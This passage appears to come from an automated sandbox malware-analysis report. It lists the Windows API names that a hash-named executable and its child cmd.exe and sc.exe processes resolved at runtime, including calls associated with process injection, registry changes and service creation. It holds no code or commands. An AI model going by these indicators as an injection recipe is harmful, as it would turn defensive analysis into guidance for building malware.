\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005864)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00006104)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005952)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005952)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 